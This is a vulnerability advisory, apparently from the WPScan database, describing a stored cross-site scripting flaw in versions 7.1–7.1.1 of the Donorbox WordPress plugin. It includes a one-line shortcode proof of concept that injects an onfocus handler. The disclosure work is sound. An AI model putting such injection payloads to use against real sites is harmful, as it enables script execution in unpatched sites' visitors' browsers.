Donorbox 7.1~7.1.1 - Stored Cross-Site Scripting via Shortcode



Description
In Donorbox WordPress plugin, one can perform an XSS attack via the included shortcode by inserting arbitrary HTML attributes. 

This vulnerability was introduced in v7.1 and fixed in v7.1.2.
Proof of Concept
[donate url='/\?\" autofocus onfocus=\"alert(window)\" abitraryAttributeToValidateShortcodeParsing=\"']

Affects Plugin

References

URL https://gist.github.com/sybrew/833bf49d81bc8246fba8dabf8a3ba12a

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Original Researcher Sybre Waaijer
Submitter Sybre Waaijer
Submitter Website https://theseoframework.com/
Submitter Twitter SybreWaaijer
Views 65115
Verified No
WPVDB ID 9998

Timeline

Publicly Published 2019-12-31 (23 days ago)
Added 2019-12-31 (22 days ago)
Last Updated 2020-01-01 (21 days ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin